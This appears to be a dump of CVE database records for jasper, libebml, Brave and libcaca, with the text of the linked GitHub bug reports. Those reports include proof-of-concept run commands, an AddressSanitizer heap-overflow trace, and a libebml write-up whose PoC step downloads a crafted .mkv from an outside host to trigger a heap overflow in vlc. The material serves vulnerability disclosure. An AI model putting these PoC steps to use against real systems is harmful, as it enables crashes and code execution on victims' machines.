"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/jasper-software/jasper/issues/264 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jasper-software",
"jasper"
] | Hi,
there's a heap-buffer-overflow vulnerability in function jp2_decode() , ( jp2_dec.c:280 )
poc: [poc.zip](https://github.com/jasper-software/jasper/files/5893235/poc.zip)
please compile the Jasper with ASAN, and run the poc with `"./jasper -f ~/Desktop/poc.jp2 --output-format jpg"`.
It seems because of the `ata.bpcc.bpcs `is not equal with `image->bpcs`
```
==62885==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000254 at pc 0x7f2781d31c39 bp 0x7ffffae212a0 sp 0x7ffffae21290
READ of size 1 at 0x602000000254 thread T0
#0 0x7f2781d31c38 in jp2_decode /home/dgh05t/fuzz/jasper-master/src/libjasper/jp2/jp2_dec.c:280
#1 0x7f2781cf90e4 in jas_image_decode /home/dgh05t/fuzz/jasper-master/src/libjasper/base/jas_image.c:436
#2 0x557083f77b62 in main /home/dgh05t/fuzz/jasper-master/src/appl/jasper.c:217
#3 0x7f2781ad40b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#4 0x557083f7874d in _start (/home/dgh05t/fuzz/jasper-master/build/src/appl/jasper+0x574d)
0x602000000254 is located 0 bytes to the right of 4-byte region [0x602000000250,0x602000000254)
allocated by thread T0 here:
#0 0x7f2781f79bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x7f2781d04886 in jas_malloc /home/dgh05t/fuzz/jasper-master/src/libjasper/base/jas_malloc.c:238
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/dgh05t/fuzz/jasper-master/src/libjasper/jp2/jp2_dec.c:280 in jp2_decode
Shadow bytes around the buggy address:
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff8000: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa
0x0c047fff8010: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa
0x0c047fff8020: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa
0x0c047fff8030: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa
=>0x0c047fff8040: fa fa 04 fa fa fa 04 fa fa fa[04]fa fa fa fd fa
0x0c047fff8050: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8060: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fff8080: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
``` | jp2_decode() heap-buffer-overflow vulnerability | https://api.github.com/repos/jasper-software/jasper/issues/264/comments | 5 | 2021-01-29T10:33:49Z | 2021-03-01T09:17:24Z | https://github.com/jasper-software/jasper/issues/264 | 796,768,912 | 264 | 1,719 |
CVE-2021-26927 | 2021-02-23T20:15:12.040 | A flaw was found in jasper before 2.0.25. A null pointer dereference in jp2_decode in jp2_dec.c may lead to program crash and denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/commit/41f214b121b837fa30d9ca5f2430212110f5cd9b"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/265"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSXESYUHMO522Z3RHXOQ2SJNWP3XTO67/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JYVCFVTVPL66OS7LCNLUSYCMYQAVWXMM/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRZFZSJ4UVLLMXSKHR455TAC2SD3TOHI/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/commit/41f214b121b837fa30d9ca5f2430212110f5cd9b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/265"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSXESYUHMO522Z3RHXOQ2SJNWP3XTO67/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JYVCFVTVPL66OS7LCNLUSYCMYQAVWXMM/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRZFZSJ4UVLLMXSKHR455TAC2SD3TOHI/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jasper_project:jasper:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F4472E5-259B-44B7-AAC5-93765989D527",
"versionEndExcluding": "2.0.25",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/jasper-software/jasper/issues/265 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"jasper-software",
"jasper"
] | Hi,
There's a Null Pointer Access in `jp2_decode /home/dgh05t/fuzz/jasper-master/src/libjasper/jp2/jp2_dec.c:442`
run the poc with `"./jasper -f ~/Desktop/poc2.jp2 --output-format jpg"`
poc:
[poc2.zip](https://github.com/jasper-software/jasper/files/5893286/poc2.zip)
| jp2_decode() Null Pointer Access | https://api.github.com/repos/jasper-software/jasper/issues/265/comments | 3 | 2021-01-29T10:42:37Z | 2021-02-10T19:29:16Z | https://github.com/jasper-software/jasper/issues/265 | 796,774,807 | 265 | 1,720 |
CVE-2021-3405 | 2021-02-23T20:15:12.087 | A flaw was found in libebml before 1.4.2. A heap overflow bug exists in the implementation of EbmlString::ReadData and EbmlUnicodeString::ReadData in libebml. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Matroska-Org/libebml/issues/74"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00016.html"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JNHQI6MDOECJ2HT5GCLEX2DMJFEOWPW7/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHIIMWZKHHELFF4NRDMOOCS3HKK3K4DF/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YY7R2JZRO5I6WS62KTJFTZGKYELVFTVB/"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202208-21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Matroska-Org/libebml/issues/74"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00016.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JNHQI6MDOECJ2HT5GCLEX2DMJFEOWPW7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHIIMWZKHHELFF4NRDMOOCS3HKK3K4DF/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YY7R2JZRO5I6WS62KTJFTZGKYELVFTVB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202208-21"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:matroska:libebml:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A929FB51-F804-41A9-AF60-834ECB4352E8",
"versionEndExcluding": "1.4.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Matroska-Org/libebml/issues/74 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Matroska-Org",
"libebml"
] | --[ 1. Summary
An extremely exploitable heap overflow bug exists in the implementation
of EbmlString::ReadData and EbmlUnicodeString::ReadData in libebml. This
bug is reachable from the current stable release of vlc.
--[ 2. Discussion
The issue exists in the calculation of the required buffer size to store
the string. The following calculation is performed:
310 auto Buffer = new (std::nothrow) char[GetSize()+1];
...
315 input.readFully(Buffer, GetSize());
The value returned from GetSize is guaranteed to be an unisigned 64 bug
number, and due to the way in which intetgers are stored and parsed in
Ebml will only use the lowest 48 bits. This guarantees that the integer
cannot overflow on 64but builds.
However, on 32bit builds, the value is implicitly cast to a size_t in
the call to new, meaning that the truncated length can be significantly
shorter than the amount of data to be copied. For example, if the length
of the string element is claimed to be 0xffffffff, the resultant
allocation will be 0x100000000. The cast to a 32bit size_t drops the top
1 bit, meaning an array of size zero is allocated.
In the event that the string element is placed maliciously at the end of
the file to be parsed, an extremely exploitable controlled heap overflow
can occur.
--[ 3. Resolution
The fix for this bug is relatively straightforward, a check must be
added to ensure that the value of GetData() + 1 is less than SIZE_MAX to
ensure that it will not be truncated in the call to new.
--[ 4. Proof of Concept
The following proof of concept file shows the behaviour in the latest
(at time of writing) version of vlc on Ubuntu 10.10.
$ sudo apt install vlc:i386 gdb
$ wget https://kryc.uk/libebml-poc.mkv
$ gdb -q vlc
$$ r libebml-poc.mkv | Ebml[Unicode]String::ReadData heap overflow bug on 32bit builds | https://api.github.com/repos/Matroska-Org/libebml/issues/74/comments | 4 | 2021-02-07T14:10:51Z | 2021-02-18T12:17:15Z | https://github.com/Matroska-Org/libebml/issues/74 | 802,961,245 | 74 | 1,721 |
CVE-2021-21323 | 2021-02-23T23:15:13.317 | Brave is an open source web browser with a focus on privacy and security. In Brave versions 1.17.73-1.20.103, the CNAME adblocking feature added in Brave 1.17.73 accidentally initiated DNS requests that bypassed the Brave Tor proxy. Users with adblocking enabled would leak DNS requests from Tor windows to their DNS provider. (DNS requests that were not initiated by CNAME adblocking would go through Tor as expected.) This is fixed in Brave version 1.20.108 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/13527"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/security/advisories/GHSA-mqjf-9x5g-2rv6"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/12fe321eaad8acc1cbd1d70b4128f687777bcf15"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/7769"
},
{
"source": "security-advisories@github.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1077022"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/13527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/security/advisories/GHSA-mqjf-9x5g-2rv6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/12fe321eaad8acc1cbd1d70b4128f687777bcf15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/7769"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1077022"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brave:brave:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD17A757-9D61-4E54-849D-AD603B5001F3",
"versionEndExcluding": null,
"versionEndIncluding": "1.20.103",
"versionStartExcluding": null,
"versionStartIncluding": "1.17.73",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/brave/brave-browser/issues/13527 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"brave",
"brave-browser"
] | https://hackerone.com/reports/1077022
~~related: #4257. it appears this was a known issue at least in the muon days. unclear if it was ever fixed in brave-core.~~
UPDATE: cause was cname adblocking, so this is a regression, not an earlier issue. | [hackerone] Tor DNS issue | https://api.github.com/repos/brave/brave-browser/issues/13527/comments | 1 | 2021-01-12T23:53:28Z | 2023-01-01T20:58:13Z | https://github.com/brave/brave-browser/issues/13527 | 784,678,328 | 13,527 | 1,722 |
CVE-2021-3410 | 2021-02-23T23:15:14.160 | A flaw was found in libcaca v0.99.beta19. A buffer overflow issue in caca_resize function in libcaca/caca/canvas.c may lead to local execution of arbitrary code in the user context. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928437"
},
{
"source": "patrick@puiterwijk.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cacalabs/libcaca/issues/52"
},
{
"source": "patrick@puiterwijk.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00006.html"
},
{
"source": "patrick@puiterwijk.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/"
},
{
"source": "patrick@puiterwijk.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/"
},
{
"source": "patrick@puiterwijk.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928437"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cacalabs/libcaca/issues/52"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00006.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta19:*:*:*:*:*:*",
"matchCriteriaId": "27B545C0-6311-4AD1-AC52-F9C86040A90B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/cacalabs/libcaca/issues/52 | [
"Third Party Advisory"
] | github.com | [
"cacalabs",
"libcaca"
] | Following vulnerability has been reported to Red Hat issue tracker:
https://bugzilla.redhat.com/show_bug.cgi?id=1928437 | CVE-2021-3410 | https://api.github.com/repos/cacalabs/libcaca/issues/52/comments | 8 | 2021-02-14T02:07:08Z | 2021-02-26T11:42:19Z | https://github.com/cacalabs/libcaca/issues/52 | 807,870,879 | 52 | 1,723 |
CVE-2021-3355 | 2021-02-24T15:15:13.933 | A stored-self XSS exists in LightCMS v1.3.4, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161562/LightCMS-1.3.4-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/Peithon/1c628ded0c4fc96c6331c3cce1d0c69b"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
